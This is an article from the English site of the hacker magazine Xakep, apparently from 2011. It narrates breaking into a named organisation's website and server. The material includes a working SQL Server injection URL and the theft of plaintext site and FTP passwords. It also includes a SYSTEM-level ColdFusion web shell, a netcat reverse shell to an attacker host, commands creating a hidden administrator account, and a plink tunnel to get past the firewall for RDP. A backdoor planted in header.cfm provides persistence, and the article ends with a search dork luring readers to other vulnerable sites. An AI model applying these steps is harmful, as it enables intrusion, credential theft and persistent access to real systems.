Welcome Guest | RSS

Official Site Of The Xakep 4T english version

Saturday, 2017-08-19, 8:19 AM
Main » 2011 » April » 16 » 7 steps from Injection to the Admin Access via RDP
8:19 AM
7 steps from Injection to the Admin Access via RDP
Any break-in pursues its own aim, which determines its value. It's up to you to decide whether to deface a site for the latent risqué things lovers or to screw up another root shell. The reality is that any vulnerability in a web application poses a threat to the server. And if you don't confine yourself to the trite and somewhat boring SQL injections so this article is right for you. The victim's address is at input, the admin access via RDP is at output – these are classics of penetration!

The Prelude, or How It All Began

And the beginning was trivial. At first there was a URL. For some reason someone was very interested in this URL, and I had to see what could be done to it. The URL at once got to Firefox, which quickly delivered a result: an institute or something of the kind, heaps of links, news, a menu and other garbage. My mouse was quickly jumping from one link to another, and my spirits were slowly rising. I've always liked sites with a huge amount of question marks, parameters such as id and numerical values in links... And to tell the truth the site was stuffed with such things not less than a dump with trash.

Having looked upon the icon of my favourite scanner I grinned and decided however not to bother the admins but to turn to the Great Index and solve everything quietly and peacefully. So, here goes a magic phrase "insite:ism.ws”, then a Search button and... may we say the thing is over?

About 10,000 results given by Google promised a laborious task. Firefox quickly acquired tabs, to which flew all sorts of quotation marks, equations, hyphens, and other evil spirits.

Chapter 1, or All of Us are Sinful

The practice shows that almost every big resource has injections. For sure there is at least one small, invisible and filterable injection. One just has to look closely. And the cherished fruit was found at the following address:


Everything turned out to be so trivial, that there was no doubt about the success of the subsequent activities. The familiar blue-grey ColdFusion error page appeared in front of me and showed the full SQL-query and DBMS type (SQL Server), and script's local address. Generally speaking the self-descriptiveness of errors delivered by ColdFusion is just amazing, - even the full call stack is given, more than one could ever take.

Chapter 2, or Long Live the Errors

icrosoft DB server has always amazed me by its capabilities. I'm not talking about standards which all DBMS developers interpret in their own way. However guys from Microsoft follow their own, unknown to the others way. For example I like to work with a SQL server. You don't need to select the number of columns or their types, you just cause a conversion error and the answer will contain the full information from the base as on a silver plate. It's very convenient! At first we'll check the output capability:

http://www.ism.ws/Applications/Forms/FormDisplay.cfm?FormID=8464+or+1= (select+@@version%2bchar(58)%2bdb_name()%2bchar(58)%2bsystem_user%2bchar(58)%2b@@servername)--

In response we get the following error:

[Macromedia][SQLServer JDBC Driver][SQLServer]
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) :RDCMS-ISM-Core:rms:ISMSQL01' to a column of data type int.

Thus we have a not too fresh server and the RDCMS-ISM-Core base. Having looked at them closely I almost jumped up with joy: the CMS abbreviation was clearly giving to understand that this site had been tossed off not on one's laps but some big and respectful company had written this wonder and made lots of money. But we'll talk about it a bit later. The DB structure is next in turn.

At this stage I don't like the brainchild of Microsoft that much. Not only did the developers not find time to create a normal results paging but they also did not manage to implement row_number Windows 2000 server. So, a cool erotic adventure using the TOP construction is waiting for us. TOP is a trick which allows to get several first entries upon query. But it is impossible to indicate the entry to begin with, and this is very inconvenient taking into consideration the circumstances of our unreal hacking. Of course one may follow the standard way: to get one entry by another, memorize and omit them during the following queries. But I don't get off on this method because it is hardly automated and the URL is not long enough so it will fail for the large databases.

That's why we'll deceive everybody. We'll sort up and down and get an acceptable paging. We'll spare the server and add the field name checking conditions – let them contain some passwords. And for the process to be ultimately cool let's first of all determine their amount (query samples are given below). So, it's 9 of them. Let's go!

The ES_LoginInfo (RDCMS-ISM-Core : dbo : ES_LoginInfo : Password) table at once caught my eye. Well, one may rub his hands and order a pizza. But nothing of the sort. Having determined the table structure I got the following picture. Three interesting fields were present in the table: EntityID, Username and Password. I think there is no need to explain that I quickly made a new query series and saw the users' data. The passwords were available and I could rush at breakneck speed to the site for the desired admin panel. By the way when I reached the sources I could hardly understand why the passwords had not been enciphered when the CMS developers had provided for it (SHA-1, SHA-512, MD5) and even had implemented their own algorithm (iMIS). But okay I logged in, examined the site and returned to the dump of the database structure because 8 more tables had fields with the passwords.

How Paging Can Be Done?

Every hacker dreams of getting all the data from a database upon one query. However life sets its own conditions and as a rule a hacker has to get information line by line. But the trouble is that each of the DBMS developers decided to worsen the situation in his own way. So, let's talk about the schemes of data paging.

  1. MySQL. It offers the following construction: limit [offset, ]rowcount. Choose "rowcount” (in our case it's 1) starting with the "offset” row. Well done!
  2. Oracle. Use the pseudo column "rownum”. The problem is that "rownum” is generated automatically and it is impossible, for example, to set a condition like "rownum=n”. Such a query will return an empty result. One cannot do without subqueries here:

    select fieldname from (select a.fieldname, rownum r from (select fieldname from tablename) as a where r=<offset>)
  3. SQL Server 2005. Here we choose a standard way: use row_number(). For example:

    select field1, field2 from (select row_number() over (order by a.field1) as r, a.field1, a.field2 from (select field1, field2 from tablename) as a) as b where r=<offset>
  4. SQL Server 2000. The situation is tough here: we've got only TOP. Let's apply such a secret: if we need to choose an entry which number is "offset” first let's choose TOP <offset> of entries with an ascending sort, and then choose the first entry with a descending sort out of the returned result. As a result the last row becomes the first one and … the thing is done. But you need to remember that in order to get a correct result you should sort all the fields in the query.

Chapter 3, or Access is Gained

The next table to attract my attention was a SM_Sites table which contained a column, and its uncomplicated name was FTPPassword. As it turned out the table also contained the FTPUserName and FTPServer columns. Having gathered the data from the table I saw that ftp.rd.net and ftp2.rd.net were used as servers. The developers' site is hosted exactly at the rd.net address and it was found out that CMS itself has a proud name of Results Direct. I never understood why the account data was kept in the base, but the data fit the ftp server. And the account named ism.ws.prod.code evoke optimistic ideas which by the way were confirmed soon. The FTP root resembled the root of the site itself. Having tested the availability of several scripts I finally established the fact of folders and files mapping. The FTP access opened new ways to uploading files to the server and saved from the inevitable difficulties connected with digging out the functional of the admin panel and searching ways to get the shell.

Chapter 4, or ColdFusion

I suppose everybody knows what to do with FTP. An idea to support the commands execution on the server and to get out of tight embrace of a web application at once crosses one's mind. Obviously we need a web shell which will allow to wander about the server and execute commands. But the trouble is that no trace of PHP or Perl at worst was detected. And it means that the moment of truth has come: we'll have to program in ColdFusion. According to the developers this environment is very flexible and easy to master but for some reason I don't like it at all. So, we'll Google the topic of web shells and terribly fail. All links were leading to one and the same plain piece of code which can only execute commands. Well okay let's complement and add this and that, we only need to use the equipment. Some time was spent on a really cool development which resulted in two offsprings. The first one shows us dirs and files, the second one listens to us and follows our orders.

The files quickly took their places. Soon after I understood that I'd gained privileges of the SYSTEM account, and it was really cool. I just could not rest on my laurels.

Chapter 5, or Blackle

The web shell is for sure a great thing but it is not as convenient as it may seem. We need to take the bull by its horns and get a normal console. The Total at once applied netcat to the FTP. Netcat was launched on the Dedicated Server in promiscuous mode: "nc.exe –l –p 1234". The following command was executed: "cmd /c nc.exe m0r0superdedik.com 1234 –e cmd". The shot was fired and the shell was put to the consoles. Having examined the file system and launched something about ten utilities, I decided that Windows without windows was a disaster. In 1999 there were no monads, I loathed to install anything, however for some reason the server managing was very inconvenient. The Netstat showed port 3389, and my eyes shone with joy. The very important and needful commands flew to the shell.

net user st password /add
net localgroup Administrators st /add

Though the mstsc command execution lead to a total failure because there arrived a message telling that the host was unavailable. NMAP disappointed me more than the previous one, because only port 80 and port 25 turned out to be opened. The host was obviously protected by the Firewall and port 3389 was trivially blocked. I did not want to give up, so I quickly made a list of the possible means of getting the graphic interface:

  • VNC;
  • PPTP;
  • SSH.

Chapter 6, or Hello, Windows

The main problem was to organize the outcoming connection to our Dedicated Server. The netcat experience had clearly shown that the ports were blocked only for the incoming connections so the organization of the outcoming connection from some graphic control system would certainly give an opportunity to manage the server. Of course the choice fell on VNC. The VNC deployment scheme is in general pretty simple (for TightVNC, for example):

  1. Upload winvnc.exe and wm_hooks.dll to the server.
  2. Install and start the VNC server.
    winvnc.exe –install
    net start "VNC Server"
  3. Start the client on the Dedicated Server in promiscuous mode.
  4. Execute the reverse-connect command.
    winvnc.exe –connect <host>:<port>.

We've done almost everything except for one small detail. That was the access to the desktop. All my cherished hopes started fading because the shell had the SYSTEM account privileges. We would not have even tried if we had not been hackers, but, just as had been expected, all the attempts failed. I even tried Metasploit with the windows/vncinject/reverse_tcp payload (it's a very slow thing) but the Great Framework did not help either. The principle of the VNC deployment to the server via a non-interactive shell and having no access to the desktop stayed unknown. In fact I even was glad – why did we have to use VNC if there was RDP? We only had to get through the Firewall.

The brilliant idea concerning PPTP is to establish a PPTP connection to our Dedicated Server and then to address the node via the intrinsic addressing with the tunneling of the traffic through the Firewall. In Windows all the connections are adapted graphically but there should be a way to work using a console. Start Procmon by Russinovich on the testing machine and monitor the register in a moment when the client activates the connection to the net. The result just can not be interpreted logically because nothing interesting happens to the register. Microsoft has surpassed itself. What was the use of creating a register if its own modules don't use it? They should think it over in their spare time and meanwhile we found a "phone book” at C:\Documents and Settings\All Users\Application Data\ Microsoft\Network\Connections\Pbk\rasphone.pbk, in which actually the parameters of the connection to the Dial-up and VPN networks were described. Establish a connection to the Dedicated Server (with the installed and adapted RRAS service) on the testing machine and copy the received file (rasphone.pbk) to the cracked host. Then create the following command file:

rasdial connection_name user password
route add mask remotehostgateway

We need the second line to restore the route by default after the connection so that our Dedicated Server would not undertake for the traffic routing. I open the .bat file and was just knocked out. I would never get my hand near the connection, the Firewall seemed to block the outcoming connections on the basis of the protocol type. Our GPE-traffic had gotten to the Blacklist as well.

We had almost given way to despair but we didn't give up. To tell the truth we'd been that dumb for a pretty long time, because we had had to turn to SSH for help right away. By the way it's a very high-end thing and this has been more than once discussed in ][. Not only can we get a shell but also we can invent lots of other interesting things. Our last hope was to successfully take only three steps:

  • to launch SSH server on the Dedicated Server
  • to upload the SSH client to the node
  • to connect and create the needed port mapping

I can understand a lot of things but I don't know why in the 21st century Windows does not have a built-in SSH server. Well okay, we'll choose anyone, all the more so there are lots of them. Of course our favourite PuTTY is used as the client. But it's not just PuTTY, it's the magic one. If you remember when addressing a new node PuTTY sincerely suggests to store the signature in the cache. Our access to the command line is not characterized by the interactivity, so we wouldn't be able to answer this question. It means that we need the signature to be stored automatically, but PuTTY can't do that. Having googled a little bit we found Quest PuTTY 0.60_q1.129. It's the same plus what we need!

Upload plink.exe to the server and execute the following command:

plink.exe -nc m0r0superdedik.com:22 -batch -pw password -R 3390: -L 3390: -l st -auto_store_key_in_cache m0r0superdedik

Check the SSH server consoles and get absolutely happy because the connection is established! Now start mstsc and connect to localhost:3390. We see the entry window of Windows 2000. Enter the data added with the help of the "net user administrator” and enjoy the graphics with the administrator's privileges. Hurrah, it's time to take a sip of a real rock'n'roll drink that is whisky and to celebrate the success.

Chapter 7, or Let there be an Automation

At first sight everything's wonderful, but to open the web shell every time and start a command to connect via SSH on the next day had become too tiresome. That's why the coolest ColdFusion shell was a little bit modified for the execution of the connection command without any human participation. The shell modification code may be found on our DVD.

A piece of the code was hidden in the following file: header.cfm, which in its turn connects to almost any CMS files. Then create a simple form, indicating any *.cfm file on the server and get a simple way of organizing RDP.

<form action="http://www.ism.ws/about/MediaRoom/RequestForm.cfm" method="POST">
<tr><td>IP:</td><td><input type="text" size="20" name="ip" value="m0r0superdedik.com"></input></td></tr>
<tr><td>SSH-port:</td><td><input type="text" size="20" name="port" value="22"></input></td></tr>
<tr><td>User:</td><td><input type="text" size="20" name="login" value="st"></input></td></tr>
<tr><td>Password:</td><td><input type="text" size="20" name="password" value="password"></input></td></tr>
<tr><td></td><td><input type="submit" value="GO!"></td></td>

The Epilogue, or Everything is Just Up to Begin

When the CMS developer's site was found I was eager to test its durability. The error in CMS was at the same place. But the SM_Sites table contained only one empty entry, and my dreams about FTP did not come true. The passwords were enciphered apparently by that very ominous iMIS (the length was 120 bits). I didn't feel like busying myself with it, so we decided to leave it for you. And in order to receive a stimulus type inurl:navItemNumber in Google and 12000 entries will lure and inspire you to perform exploits.

Carry any work to completion even if it seems absolutely unreal, otherwise any initiative of yours becomes pointless. All the described above actions were taken while listening to the music of Brahms (thanks to "_xCort_" from torrents.ru). Paraphrasing the words of the "Smoke Under Water” program permanent dj Kirill Nemolyayev "Listen to the classics and be happy!”


To make the vulnerability search automated you may use the following products:

acunetix.com/vulnerability-scanner/ - Accunetix Web Vulnerability Scanner
ptsecurity.ru/xs7.asp – Xspider.
cirt.net/nikto2 – Nikto.
sensepost.com/research/wikto – Wikto.


The process of manual retrieving the information from the DB is tiresome and thankless. Look closely at the automation means (or develop your own product), for example, SIPT. IMHO the program often glitches, works in a single-flow way but it copes with its task well.

Read the full version of the article in the June issue of HACKER.


Warning: this material is provided for informational purposes only. Neither the author nor the editorial board is responsible for your actions!

Views: 594 | Added by: XakepNews | Rating: 0.0/0
Total comments: 0